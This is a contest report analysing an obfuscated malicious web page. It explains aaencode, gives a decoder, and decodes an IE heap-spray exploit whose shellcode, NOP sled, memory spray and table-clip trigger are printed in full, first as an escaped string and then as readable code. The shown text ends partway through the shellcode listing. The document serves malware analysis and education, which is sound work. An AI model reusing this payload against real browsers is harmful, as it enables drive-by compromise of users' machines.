Hackers' Dream Contest

Report: Web Challenge

0. About

Author: Tsukasa Ooi

Date: 2010/11/23-29

1. Decoding Obfuscated Script

1-1. aaencode

This type of JavaScript is very famous in Japan. That does not mean it is famous as a threat; rather, its author, Yosuke Hasegawa, is very famous in Japan. He transforms JavaScript into various interesting styles.

Obviously, this script was generated by his creation, aaencode. First, I will try to deobfuscate the script using its source code. aaencode's source code is embedded as JavaScript in the site above, so I (and you) can get it.

Now I assume the target's script was generated by aaencode, and I will make `aadecode', which decodes/deobfuscates scripts generated by aaencode. The important part is the `aaencode' function in the generator. The generated script is very simple: apart from the header and footer, only a few characters are used for encoding. The conversion table is below.

char | aaencode expression
-----+--------------------------------
\    | (゚Д゚)[゚ε゚]
u    | (o゚ー゚o)
0    | (c^_^o)
1    | (゚Θ゚)
2    | ((o^_^o) - (゚Θ゚))
3    | (o^_^o)
4    | (゚ー゚)
5    | ((゚ー゚) + (゚Θ゚))
6    | ((o^_^o) +(o^_^o))
7    | ((゚ー゚) + (o^_^o))
8    | ((゚ー゚) + (゚ー゚))
9    | ((゚ー゚) + (゚ー゚) + (゚Θ゚))
a    | (゚Д゚) .゚ω゚ノ
b    | (゚Д゚) .゚Θ゚ノ
c    | (゚Д゚) ['c']
d    | (゚Д゚) .゚ー゚ノ
e    | (゚Д゚) .゚Д゚ノ
f    | (゚Д゚) [゚Θ゚]

Each character of the original script is escaped (in \ooo form for codes up to 127, \uxxxx form otherwise) and then transcoded with this table. The obfuscated string is built by simply concatenating the encoded characters with `+'. The header and footer then execute the result through an eval-style technique (the Function constructor).

1-2. aadecode

aadecode recovers the original characters of the script using the table above and unescapes them. Web-Challenge.html contains two obfuscated scripts, and aadecode decodes both without any errors.
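As an added example (this is neither Hasegawa's aaencode nor the aadecode written for this report), the per-character scheme of the table above in JavaScript: an encoder that produces the body, and a decoder that reverses it. Assumptions: the table strings are copied verbatim from this report (a real sample may use half-width katakana variants, so normalize to the same form before matching); the decoder is applied to the body between aaencode's header and footer, which have to be cut off first; whitespace is ignored when matching because the emitted spacing varies.

```javascript
// Added example: the per-character scheme of aaencode from the table above,
// re-implemented (neither Hasegawa's aaencode nor the report's aadecode).
// Table strings are copied verbatim from the report.
const AA_TABLE = {
  '\\': '(゚Д゚)[゚ε゚]',
  'u':  '(o゚ー゚o)',
  '0':  '(c^_^o)',
  '1':  '(゚Θ゚)',
  '2':  '((o^_^o) - (゚Θ゚))',
  '3':  '(o^_^o)',
  '4':  '(゚ー゚)',
  '5':  '((゚ー゚) + (゚Θ゚))',
  '6':  '((o^_^o) +(o^_^o))',
  '7':  '((゚ー゚) + (o^_^o))',
  '8':  '((゚ー゚) + (゚ー゚))',
  '9':  '((゚ー゚) + (゚ー゚) + (゚Θ゚))',
  'a':  '(゚Д゚) .゚ω゚ノ',
  'b':  '(゚Д゚) .゚Θ゚ノ',
  'c':  "(゚Д゚) ['c']",
  'd':  '(゚Д゚) .゚ー゚ノ',
  'e':  '(゚Д゚) .゚Д゚ノ',
  'f':  '(゚Д゚) [゚Θ゚]',
};

// Encoder step 1: escape every UTF-16 unit as \ooo (<= 0x7f) or \uxxxx,
// so the only characters left are the 18 keys of AA_TABLE.
function escapeSource(text) {
  let out = '';
  for (let i = 0; i < text.length; i++) {
    const n = text.charCodeAt(i);
    out += n <= 0x7f ? '\\' + n.toString(8)
                     : '\\u' + n.toString(16).padStart(4, '0');
  }
  return out;
}

// Encoder step 2: replace each escaped character by its expression and
// join with '+'.  The header and footer (which evaluate the result through
// the Function constructor) are deliberately not reproduced here.
function aaencodeBody(text) {
  return Array.from(escapeSource(text), ch => {
    const expr = AA_TABLE[ch];
    if (expr === undefined) throw new Error('unencodable character: ' + ch);
    return expr;
  }).join('+ ');
}

// Decoder: reverse table, whitespace-insensitive, longest expression first
// so that a short expression can never be matched inside a longer one.
const strip = s => s.replace(/\s+/g, '');
const REVERSE = Object.entries(AA_TABLE)
  .map(([ch, expr]) => [strip(expr), ch])
  .sort((a, b) => b[0].length - a[0].length);

// Step 2 reversed: the body (text between aaencode's header and footer)
// back into the escaped source.
function aadecodeToEscaped(body) {
  const src = strip(body);
  let escaped = '';
  for (let i = 0; i < src.length; ) {
    if (src[i] === '+') { i++; continue; }
    const hit = REVERSE.find(([expr]) => src.startsWith(expr, i));
    if (!hit) throw new Error('unknown token at ' + i + ': ' + src.slice(i, i + 24));
    escaped += hit[1];
    i += hit[0].length;
  }
  return escaped;
}

// Step 1 reversed without eval/Function: only \ooo and \uxxxx can occur.
function unescapeJs(escaped) {
  return escaped.replace(/\\u([0-9a-fA-F]{4})|\\([0-7]{1,3})/g,
    (m, hex, oct) => String.fromCharCode(
      hex !== undefined ? parseInt(hex, 16) : parseInt(oct, 8)));
}

function aadecode(body) {
  return unescapeJs(aadecodeToEscaped(body));
}
```

The escaped intermediate form this produces for the first script is exactly the `\141\154\145...` string shown below; running `unescapeJs` on it gives `alert("we love ASEC +_+")` without handing the attacker's string to eval.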

The intermediate (escaped) result is below.

\141\154\145\162\164\50\42\167\145\40\154\157\166\145\40\101\123\105\103\40\53\137\53\42\51
\162\162\162\142\75\40\50\42\167\157\60\157\61\60\105\102\167\157\60\157\64\102\65\102\167\157\60\157\103\71\63\63\167\157\60\157\102\71\66\66\167\157\60\157\60\63\70\63\167\157\60\157\63\64\70\60\167\157\60\157\104\61\60\102\167\157\60\157\106\101\105\62\167\157\60\157\60\65\105\102\167\157\60\157\105\102\105\70\167\157\60\157\106\106\106\106\167\157\60\157\63\70\106\106\167\157\60\157\104\63\60\67\167\157\60\157\104\61\104\61\167\157\60\157\102\65\70\105\167\157\60\157\105\61\67\60\167\157\60\157\104\61\104\61\167\157\60\157\65\101\104\61\167\157\60\157\104\104\71\61\167\157\60\157\101\61\65\101\167\157\60\157\67\103\103\104\167\157\60\157\102\71\65\101\167\157\60\157\65\101\104\71\167\157\60\157\102\102\62\66\167\157\60\157\70\70\104\64\167\157\60\157\70\103\63\71\167\157\60\157\104\61\104\60\167\157\60\157\63\63\104\61\167\157\60\157\71\61\62\70\167\157\60\157\105\71\65\61\167\157\60\157\101\64\61\62\167\157\60\157\65\70\62\102\167\157\60\157\105\65\71\67\167\157\60\157\101\63\102\71\167\157\60\157\104\61\101\65\167\157\60\157\102\71\104\61\167\157\60\157\101\62\102\103\167\157\60\157\102\62\101\67\167\157\60\157\60\104\65\101\167\157\60\157\103\61\63\101\167\157\60\157\62\105\70\62\167\157\60\157\105\65\101\67\167\157\60\157\62\105\65\101\167\157\60\157\65\101\70\64\167\157\60\157\65\101\63\104\167\157\60\157\65\103\103\67\167\157\60\157\104\64\70\63\167\157\60\157\63\63\62\105\167\157\60\157\63\101\63\71\167\157\60\157\62\105\62\105\167\157\60\157\70\102\62\105\167\157\60\157\102\102\70\102\167\157\60\157\70\70\104\64\167\157\60\157\65\101\70\64\167\157\60\157\63\71\63\71\167\157\60\157\104\60\106\63\167\157\60\157\104\61\104\61\167\157\60\157\62\70\63\63\167\157\60\157\102\71\70\103\167\157\60\157\102\106\102\105\167\157\60\157\104\61\104\61\167\157\60\157\101\64\102\71\167\157\60\157\102\104\101\63\167\157\60\157\65\101\102\103\167\157\60\157\63\101\60\104\167\157\60\157\70\62\103\61\167\157\60\157\101\67\62\105\167\157\60\157\65\101\105\65\167\157\60\157\70
\64\62\105\167\157\60\157\63\104\65\101\167\157\60\157\103\67\65\101\167\157\60\157\70\63\65\103\167\157\60\157\62\105\104\64\167\157\60\157\63\71\63\63\167\157\60\157\62\105\63\101\167\157\60\157\62\105\62\105\167\157\60\157\70\102\70\102\167\157\60\157\65\101\70\64\167\157\60\157\63\71\63\71\167\157\60\157\104\61\62\63\167\157\60\157\104\61\104\61\167\157\60\157\102\71\70\103\167\157\60\157\105\62\102\104\167\157\60\157\104\61\105\63\167\157\60\157\101\62\102\71\167\157\60\157\102\64\102\71\167\157\60\157\65\101\102\104\167\157\60\157\63\101\60\104\167\157\60\157\70\62\103\61\167\157\60\157\101\67\62\105\167\157\60\157\65\101\105\65\167\157\60\157\70\64\62\105\167\157\60\157\63\104\65\101\167\157\60\157\103\67\65\101\167\157\60\157\70\63\65\103\167\157\60\157\62\105\104\64\167\157\60\157\63\71\63\63\167\157\60\157\62\105\63\101\167\157\60\157\62\105\62\105\167\157\60\157\70\102\70\102\167\157\60\157\65\101\70\64\167\157\60\157\63\71\63\71\167\157\60\157\104\61\61\65\167\157\60\157\104\61\104\61\167\157\60\157\66\105\63\71\167\157\60\157\104\61\104\61\167\157\60\157\70\103\104\61\167\157\60\157\63\104\65\60\167\157\60\157\104\60\104\61\167\157\60\157\104\61\104\61\167\157\60\157\60\104\65\101\167\157\60\157\102\71\70\62\167\157\60\157\104\60\104\61\167\157\60\157\104\61\104\61\167\157\60\157\70\67\62\105\167\157\60\157\65\70\104\65\167\157\60\157\105\71\70\106\167\157\60\157\104\65\61\66\167\157\60\157\102\104\104\62\167\157\60\157\102\66\102\105\167\157\60\157\61\66\106\106\167\157\60\157\104\62\71\65\167\157\60\157\102\66\104\65\167\157\60\157\102\67\102\70\167\157\60\157\105\62\104\61\167\157\60\157\70\61\61\61\167\157\60\157\70\62\70\61\167\157\60\157\60\67\65\101\167\157\60\157\61\63\65\62\167\157\60\157\70\63\101\101\167\157\60\157\62\105\70\61\167\157\60\157\106\71\70\67\167\157\60\157\63\104\65\60\167\157\60\157\104\60\104\61\167\157\60\157\104\61\104\61\167\157\60\157\60\104\65\101\167\157\60\157\61\61\105\62\167\157\60\157\102\102\70\61\167\157\60\157\70\
62\103\102\167\157\60\157\62\105\70\61\167\157\60\157\105\61\70\67\167\157\60\157\61\101\65\101\167\157\60\157\65\61\71\60\167\157\60\157\104\61\105\70\167\157\60\157\62\102\101\64\167\157\60\157\104\60\61\66\167\157\60\157\102\60\70\104\167\157\60\157\102\66\102\104\167\157\60\157\71\60\61\66\167\157\60\157\106\106\104\65\167\157\60\157\101\71\102\64\167\157\60\157\61\66\102\64\167\157\60\157\104\71\71\60\167\157\60\157\104\61\104\61\167\157\60\157\104\61\104\61\167\157\60\157\70\106\65\70\167\157\60\157\62\105\105\104\167\157\60\157\105\104\101\67\167\157\60\157\101\67\62\105\167\157\60\157\63\71\105\71\167\157\60\157\104\61\64\64\167\157\60\157\104\61\104\61\167\157\60\157\61\61\105\62\167\157\60\157\103\65\63\101\167\157\60\157\62\105\70\61\167\157\60\157\105\104\101\67\167\157\60\157\101\67\62\105\167\157\60\157\65\101\105\65\167\157\60\157\70\64\62\105\167\157\60\157\63\104\65\101\167\157\60\157\70\67\65\101\167\157\60\157\65\103\104\71\167\157\60\157\104\64\70\63\167\157\60\157\63\63\62\105\167\157\60\157\63\66\63\71\167\157\60\157\62\105\62\105\167\157\60\157\102\71\62\105\167\157\60\157\104\62\63\71\167\157\60\157\104\61\104\61\167\157\60\157\70\67\62\105\167\157\60\157\62\105\103\61\167\157\60\157\105\71\101\67\167\157\60\157\70\67\62\105\167\157\60\157\65\60\104\104\167\157\60\157\104\65\61\65\167\157\60\157\104\61\104\63\167\157\60\157\105\62\104\61\167\157\60\157\102\102\61\70\167\157\60\157\70\60\104\62\167\157\60\157\61\67\65\101\167\157\60\157\61\61\65\62\167\157\60\157\70\61\102\63\167\157\60\157\61\67\65\101\167\157\60\157\61\61\65\62\167\157\60\157\70\61\70\61\167\157\60\157\61\67\65\101\167\157\60\157\61\61\65\62\167\157\60\157\70\61\70\103\167\157\60\157\62\105\70\60\167\157\60\157\106\104\70\67\167\157\60\157\62\105\70\60\167\157\60\157\103\65\70\67\167\157\60\157\70\67\70\60\167\157\60\157\101\64\65\101\167\157\60\157\65\101\105\104\167\157\60\157\106\106\101\65\167\157\60\157\104\62\101\71\167\157\60\157\70\67\62\64\167\157\60\157\101\67\65\1
01\167\157\60\157\104\62\106\61\167\157\60\157\105\62\62\64\167\157\60\157\71\70\61\70\167\157\60\157\67\103\71\60\167\157\60\157\61\64\104\62\167\157\60\157\60\101\105\62\167\157\60\157\66\106\104\105\167\157\60\157\105\102\103\61\167\157\60\157\101\65\60\67\167\157\60\157\61\60\104\71\167\157\60\157\104\103\61\101\167\157\60\157\60\102\104\62\167\157\60\157\63\101\71\61\167\157\60\157\105\101\62\60\167\157\60\157\101\64\103\105\167\157\60\157\70\106\63\66\167\157\60\157\70\106\65\101\167\157\60\157\104\62\106\65\167\157\60\157\102\67\60\103\167\157\60\157\104\104\65\101\167\157\60\157\65\101\71\101\167\157\60\157\103\104\70\106\167\157\60\157\60\103\104\62\167\157\60\157\104\65\65\101\167\157\60\157\104\62\65\101\167\157\60\157\67\101\61\64\167\157\60\157\70\70\70\106\167\157\60\157\70\64\61\62\167\157\60\157\63\104\65\101\167\157\60\157\63\104\65\62\167\157\60\157\70\63\70\65\167\157\60\157\70\62\70\60\167\157\60\157\70\66\70\67\167\157\60\157\101\103\65\103\167\157\60\157\66\70\67\104\167\157\60\157\104\61\103\64\167\157\60\157\104\61\104\61\167\157\60\157\61\104\66\71\167\157\60\157\61\104\61\104\167\157\60\157\62\62\61\104\167\157\60\157\61\66\67\101\167\157\60\157\62\104\71\64\167\157\60\157\104\61\104\61\167\157\60\157\104\61\104\61\167\157\60\157\61\67\65\101\167\157\60\157\61\61\65\62\167\157\60\157\70\61\71\61\167\157\60\157\71\64\65\101\167\157\60\157\70\61\104\71\167\157\60\157\70\67\62\105\167\157\60\157\65\62\103\71\167\157\60\157\104\71\61\65\167\157\60\157\71\64\65\70\167\157\60\157\65\62\62\71\167\157\60\157\62\71\101\103\167\157\60\157\101\64\104\61\167\157\60\157\105\62\104\66\167\157\60\157\63\70\61\61\167\157\60\157\104\61\61\104\167\157\60\157\104\61\104\61\167\157\60\157\61\106\65\101\167\157\60\157\61\60\65\62\167\157\60\157\70\60\71\65\167\157\60\157\71\103\65\101\167\157\60\157\70\60\104\104\167\157\60\157\70\67\62\105\167\157\60\157\65\62\103\71\167\157\60\157\104\71\61\65\167\157\60\157\71\64\65\70\167\157\60\157\65\62\62\65\167\157\60\1
57\62\65\101\103\167\157\60\157\101\64\104\61\167\157\60\157\105\62\104\66\167\157\60\157\63\70\61\61\167\157\60\157\104\61\67\104\167\157\60\157\104\61\104\61\167\157\60\157\71\64\61\66\167\157\60\157\104\61\63\104\167\157\60\157\104\61\104\61\167\157\60\157\65\101\104\61\167\157\60\157\62\65\70\64\167\157\60\157\102\102\70\63\167\157\60\157\102\102\104\60\167\157\60\157\65\101\104\67\167\157\60\157\65\62\60\67\167\157\60\157\71\71\61\63\167\157\60\157\62\105\70\63\167\157\60\157\106\61\70\67\167\157\60\157\61\65\65\62\167\157\60\157\66\71\103\61\167\157\60\157\104\61\104\60\167\157\60\157\104\61\104\61\167\157\60\157\61\61\65\64\167\157\60\157\102\105\101\65\167\157\60\157\71\103\65\101\167\157\60\157\70\60\62\71\167\157\60\157\104\60\102\102\167\157\60\157\104\60\102\102\167\157\60\157\70\64\65\103\167\157\60\157\70\63\62\61\167\157\60\157\70\67\62\105\167\157\60\157\65\62\103\104\167\157\60\157\103\61\61\65\167\157\60\157\71\64\65\70\167\157\60\157\65\62\62\104\167\157\60\157\62\104\101\103\167\157\60\157\101\64\104\61\167\157\60\157\63\101\104\63\167\157\60\157\65\101\70\63\167\157\60\157\63\104\71\64\167\157\60\157\61\61\65\62\167\157\60\157\65\70\104\60\167\157\60\157\63\104\71\64\167\157\60\157\101\103\65\62\167\157\60\157\104\67\63\104\167\157\60\157\104\63\101\105\167\157\60\157\61\70\63\101\167\157\60\157\71\103\65\101\167\157\60\157\65\60\62\61\167\157\60\157\62\105\63\60\167\157\60\157\104\61\104\61\167\157\60\157\65\64\104\61\167\157\60\157\101\65\61\70\167\157\60\157\65\101\106\61\167\157\60\157\62\61\70\64\167\157\60\157\63\63\65\60\167\157\60\157\104\61\62\105\167\157\60\157\104\61\104\61\167\157\60\157\105\106\66\70\167\157\60\157\104\61\104\61\167\157\60\157\65\60\104\61\167\157\60\157\62\105\63\60\167\157\60\157\104\61\104\61\167\157\60\157\105\101\104\61\167\157\60\157\101\65\60\60\167\157\60\157\65\102\104\71\167\157\60\157\62\61\71\64\167\157\60\157\105\106\105\65\167\157\60\157\71\64\65\71\167\157\60\157\65\101\62\61\167\157\60\157\62\65\71\1
03\167\157\60\157\102\102\70\60\167\157\60\157\102\102\104\60\167\157\60\157\65\103\104\60\167\157\60\157\62\61\70\64\167\157\60\157\62\105\70\63\167\157\60\157\106\61\70\67\167\157\60\157\61\65\65\62\167\157\60\157\63\101\103\61\167\157\60\157\65\101\65\71\167\157\60\157\62\71\71\64\167\157\60\157\62\105\70\61\167\157\60\157\106\65\70\67\167\157\60\157\61\65\65\62\167\157\60\157\65\101\104\65\167\157\60\157\62\65\71\103\167\157\60\157\62\105\70\60\167\157\60\157\106\65\70\67\167\157\60\157\61\65\65\62\167\157\60\157\66\71\104\65\167\157\60\157\104\61\104\60\167\157\60\157\104\61\104\61\167\157\60\157\70\106\70\105\167\157\60\157\70\70\70\101\167\157\60\157\65\62\70\102\167\157\60\157\70\65\61\65\167\157\60\157\63\64\65\101\167\157\60\157\61\62\70\103\167\157\60\157\106\64\63\71\167\157\60\157\62\105\62\103\167\157\60\157\65\106\62\105\167\157\60\157\104\106\71\106\167\157\60\157\105\62\63\104\167\157\60\157\65\102\61\102\167\157\60\157\64\71\70\101\167\157\60\157\65\102\62\106\167\157\60\157\106\64\104\106\167\157\60\157\62\105\66\61\167\157\60\157\66\61\61\63\167\157\60\157\106\103\71\70\167\157\60\157\101\65\60\101\167\157\60\157\71\71\103\106\167\157\60\157\102\106\61\103\167\157\60\157\106\106\101\104\167\157\60\157\67\65\63\60\167\157\60\157\104\106\101\70\167\157\60\157\60\71\63\66\167\157\60\157\67\66\65\102\167\157\60\157\70\71\63\66\167\157\60\157\64\106\71\104\167\157\60\157\105\67\60\101\167\157\60\157\106\105\103\102\167\157\60\157\70\106\101\61\167\157\60\157\63\60\66\101\167\157\60\157\103\63\103\101\167\157\60\157\61\101\104\63\167\157\60\157\105\60\103\64\167\157\60\157\105\62\105\63\167\157\60\157\105\64\105\65\167\157\60\157\105\66\105\67\167\157\60\157\105\70\105\71\167\157\60\157\104\61\105\61\167\157\60\157\101\63\104\61\167\157\60\157\106\101\102\63\167\157\60\157\101\66\104\61\167\157\60\157\106\101\102\63\167\157\60\157\71\103\104\61\167\157\60\157\64\61\70\102\167\157\60\157\104\62\104\61\167\157\60\157\104\61\104\61\167\157\60\157\71\70\10
4\61\167\157\60\157\70\71\71\64\167\157\60\157\71\104\70\61\167\157\60\157\70\63\71\105\167\157\60\157\106\106\71\64\167\157\60\157\70\71\71\64\167\157\60\157\104\61\71\64\167\157\60\157\101\61\102\105\167\157\60\157\102\106\102\64\167\157\60\157\102\71\104\61\167\157\60\157\101\65\101\65\167\157\60\157\105\102\101\61\167\157\60\157\106\105\106\105\167\157\60\157\101\66\101\66\167\157\60\157\106\106\101\66\167\157\60\157\102\71\102\60\167\157\60\157\102\104\102\106\167\157\60\157\102\63\102\60\167\157\60\157\102\62\106\106\167\157\60\157\102\103\102\105\167\157\60\157\102\101\104\61\167\157\60\157\101\70\102\64\167\157\60\157\105\102\106\61\167\157\60\157\102\71\106\61\167\157\60\157\102\104\102\64\167\157\60\157\102\105\102\104\167\157\60\157\71\60\106\61\167\157\60\157\71\64\70\62\167\157\60\157\71\61\71\62\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\104\61\106\60\42\51\73\162\162\162\141\75\165\156\145\163\143\141\160\145\50\162\162\162\142\56\162\145\160\154\141\143\145\50\57\167\157\60\157\57\147\54\42\45\165\42\51\51\73\40\166\141\162\40\162\162\162\141\142\142\142\40\75\40\60\170\70\66\60\60\60\55\50\162\162\162\141\56\154\145\156\147\164\150\52\62\51\73\167\167\167\167\167\167\167\167\167\167\75\165\156\145\163\143\141\160\145\50\47\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\7
1\60\47\51\73\40\167\150\151\154\145\50\167\167\167\167\167\167\167\167\167\167\56\154\145\156\147\164\150\74\162\162\162\141\142\142\142\57\62\51\40\173\40\167\167\167\167\167\167\167\167\167\167\53\75\167\167\167\167\167\167\167\167\167\167\73\40\175\40\166\141\162\40\142\151\147\142\154\157\143\153\40\75\40\167\167\167\167\167\167\167\167\167\167\56\163\165\142\163\164\162\151\156\147\50\60\54\162\162\162\141\142\142\142\57\62\51\73\40\155\145\155\40\75\40\156\145\167\40\101\162\162\141\171\50\51\73\40\146\157\162\50\151\75\60\73\40\151\74\61\65\60\60\73\40\151\53\53\51\40\173\155\145\155\133\151\135\40\75\40\142\151\147\142\154\157\143\153\40\53\40\142\151\147\142\154\157\143\153\40\53\40\162\162\162\141\73\175\40\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\164\141\142\154\145\40\163\164\171\154\145\75\160\157\163\151\164\151\157\156\72\141\142\163\157\154\165\164\145\73\143\154\151\160\72\162\145\143\164\50\60\51\76\42\51\73

And now the unescaped one.

alert("we love ASEC +_+")
rrrb= ("[...long wo0o string; reproduced in full in section 2-1...]");rrra=unescape(rrrb.replace(/wo0o/g,"%u")); var rrrabbb = 0x86000-(rrra.length*2);wwwwwwwwww=unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090'); while(wwwwwwwwww.length<rrrabbb/2) { wwwwwwwwww+=wwwwwwwwww; } var bigblock = wwwwwwwwww.substring(0,rrrabbb/2); mem = new Array(); for(i=0; i<1500; i++) {mem[i] = bigblock + bigblock + rrra;} document.write("<table style=position:absolute;clip:rect(0)>");

The second script is presumably related to an IE vulnerability.

1-3. base64 hint?!

Incidentally, I found several base64 strings at the end of the HTML file. By decoding the base64 repeatedly, I found an interesting string in the middle.

Thx hasegawa!! do you know only base64? -_-

Unfortunately, I had already decoded the script before finding this base64 string.

1-4. Differences between browsers

This script obfuscation is very browser-specific.

browser                          | result
---------------------------------+---------------
Internet Explorer 6              | does not work
Internet Explorer 7              | does not work
Internet Explorer 8              | works!
Google Chrome (4-7)              | works!
Mozilla Firefox (3.0, 3.5, 3.6)  | works!
Android 2.1 (WebKit 530.17)      | works!
iOS 4.1 (Safari/WebKit 532.9)    | works!
Opera (10, 10.50, 10.63)         | works!

Almost all recent, modern browsers can understand this obfuscated JavaScript and run it.

A notable point is compatibility mode. The obfuscated script will not run in IE8 compatibility mode, but because of the meta tag below, IE8 renders this file in standards mode.

<meta http-equiv="X-UA-Compatible" content="IE=edge" />

2. Analyze the decoded script

2-1. Header

I will make the second script easier to read.

// Unescape the SHELLCODE
shellcode_esc = (
	"wo0o10EBwo0o4B5Bwo0oC933wo0oB966wo0o0383wo0o3480wo0oD10Bwo0oFAE2" +
	"wo0o05EBwo0oEBE8wo0oFFFFwo0o38FFwo0oD307wo0oD1D1wo0oB58Ewo0oE170" +
	"wo0oD1D1wo0o5AD1wo0oDD91wo0oA15Awo0o7CCDwo0oB95Awo0o5AD9wo0oBB26" +
	"wo0o88D4wo0o8C39wo0oD1D0wo0o33D1wo0o9128wo0oE951wo0oA412wo0o582B" +
	"wo0oE597wo0oA3B9wo0oD1A5wo0oB9D1wo0oA2BCwo0oB2A7wo0o0D5Awo0oC13A" +
	"wo0o2E82wo0oE5A7wo0o2E5Awo0o5A84wo0o5A3Dwo0o5CC7wo0oD483wo0o332E" +
	"wo0o3A39wo0o2E2Ewo0o8B2Ewo0oBB8Bwo0o88D4wo0o5A84wo0o3939wo0oD0F3" +
	"wo0oD1D1wo0o2833wo0oB98Cwo0oBFBEwo0oD1D1wo0oA4B9wo0oBDA3wo0o5ABC" +
	"wo0o3A0Dwo0o82C1wo0oA72Ewo0o5AE5wo0o842Ewo0o3D5Awo0oC75Awo0o835C" +
	"wo0o2ED4wo0o3933wo0o2E3Awo0o2E2Ewo0o8B8Bwo0o5A84wo0o3939wo0oD123" +
	"wo0oD1D1wo0oB98Cwo0oE2BDwo0oD1E3wo0oA2B9wo0oB4B9wo0o5ABDwo0o3A0D" +
	"wo0o82C1wo0oA72Ewo0o5AE5wo0o842Ewo0o3D5Awo0oC75Awo0o835Cwo0o2ED4" +
	"wo0o3933wo0o2E3Awo0o2E2Ewo0o8B8Bwo0o5A84wo0o3939wo0oD115wo0oD1D1" +
	"wo0o6E39wo0oD1D1wo0o8CD1wo0o3D50wo0oD0D1wo0oD1D1wo0o0D5Awo0oB982" +
	"wo0oD0D1wo0oD1D1wo0o872Ewo0o58D5wo0oE98Fwo0oD516wo0oBDD2wo0oB6BE" +
	"wo0o16FFwo0oD295wo0oB6D5wo0oB7B8wo0oE2D1wo0o8111wo0o8281wo0o075A" +
	"wo0o1352wo0o83AAwo0o2E81wo0oF987wo0o3D50wo0oD0D1wo0oD1D1wo0o0D5A" +
	"wo0o11E2wo0oBB81wo0o82CBwo0o2E81wo0oE187wo0o1A5Awo0o5190wo0oD1E8" +
	"wo0o2BA4wo0oD016wo0oB08Dwo0oB6BDwo0o9016wo0oFFD5wo0oA9B4wo0o16B4" +
	"wo0oD990wo0oD1D1wo0oD1D1wo0o8F58wo0o2EEDwo0oEDA7wo0oA72Ewo0o39E9" +
	"wo0oD144wo0oD1D1wo0o11E2wo0oC53Awo0o2E81wo0oEDA7wo0oA72Ewo0o5AE5" +
	"wo0o842Ewo0o3D5Awo0o875Awo0o5CD9wo0oD483wo0o332Ewo0o3639wo0o2E2E" +
	"wo0oB92Ewo0oD239wo0oD1D1wo0o872Ewo0o2EC1wo0oE9A7wo0o872Ewo0o50DD" +
	"wo0oD515wo0oD1D3wo0oE2D1wo0oBB18wo0o80D2wo0o175Awo0o1152wo0o81B3" +
	"wo0o175Awo0o1152wo0o8181wo0o175Awo0o1152wo0o818Cwo0o2E80wo0oFD87" +
	"wo0o2E80wo0oC587wo0o8780wo0oA45Awo0o5AEDwo0oFFA5wo0oD2A9wo0o8724" +
	"wo0oA75Awo0oD2F1wo0oE224wo0o9818wo0o7C90wo0o14D2wo0o0AE2wo0o6FDE" +
	"wo0oEBC1wo0oA507wo0o10D9wo0oDC1Awo0o0BD2wo0o3A91wo0oEA20wo0oA4CE" +
	"wo0o8F36wo0o8F5Awo0oD2F5wo0oB70Cwo0oDD5Awo0o5A9Awo0oCD8Fwo0o0CD2" +
	"wo0oD55Awo0oD25Awo0o7A14wo0o888Fwo0o8412wo0o3D5Awo0o3D52wo0o8385" +
	"wo0o8280wo0o8687wo0oAC5Cwo0o687Dwo0oD1C4wo0oD1D1wo0o1D69wo0o1D1D" +
	"wo0o221Dwo0o167Awo0o2D94wo0oD1D1wo0oD1D1wo0o175Awo0o1152wo0o8191" +
	"wo0o945Awo0o81D9wo0o872Ewo0o52C9wo0oD915wo0o9458wo0o5229wo0o29AC" +
	"wo0oA4D1wo0oE2D6wo0o3811wo0oD11Dwo0oD1D1wo0o1F5Awo0o1052wo0o8095" +
	"wo0o9C5Awo0o80DDwo0o872Ewo0o52C9wo0oD915wo0o9458wo0o5225wo0o25AC" +
	"wo0oA4D1wo0oE2D6wo0o3811wo0oD17Dwo0oD1D1wo0o9416wo0oD13Dwo0oD1D1" +
	"wo0o5AD1wo0o2584wo0oBB83wo0oBBD0wo0o5AD7wo0o5207wo0o9913wo0o2E83" +
	"wo0oF187wo0o1552wo0o69C1wo0oD1D0wo0oD1D1wo0o1154wo0oBEA5wo0o9C5A" +
	"wo0o8029wo0oD0BBwo0oD0BBwo0o845Cwo0o8321wo0o872Ewo0o52CDwo0oC115" +
	"wo0o9458wo0o522Dwo0o2DACwo0oA4D1wo0o3AD3wo0o5A83wo0o3D94wo0o1152" +
	"wo0o58D0wo0o3D94wo0oAC52wo0oD73Dwo0oD3AEwo0o183Awo0o9C5Awo0o5021" +
	"wo0o2E30wo0oD1D1wo0o54D1wo0oA518wo0o5AF1wo0o2184wo0o3350wo0oD12E" +
	"wo0oD1D1wo0oEF68wo0oD1D1wo0o50D1wo0o2E30wo0oD1D1wo0oEAD1wo0oA500" +
	"wo0o5BD9wo0o2194wo0oEFE5wo0o9459wo0o5A21wo0o259Cwo0oBB80wo0oBBD0" +
	"wo0o5CD0wo0o2184wo0o2E83wo0oF187wo0o1552wo0o3AC1wo0o5A59wo0o2994" +
	"wo0o2E81wo0oF587wo0o1552wo0o5AD5wo0o259Cwo0o2E80wo0oF587wo0o1552" +
	"wo0o69D5wo0oD1D0wo0oD1D1wo0o8F8Ewo0o888Awo0o528Bwo0o8515wo0o345A" +
	"wo0o128Cwo0oF439wo0o2E2Cwo0o5F2Ewo0oDF9Fwo0oE23Dwo0o5B1Bwo0o498A" +
	"wo0o5B2Fwo0oF4DFwo0o2E61wo0o6113wo0oFC98wo0oA50Awo0o99CFwo0oBF1C" +
	"wo0oFFADwo0o7530wo0oDFA8wo0o0936wo0o765Bwo0o8936wo0o4F9Dwo0oE70A" +
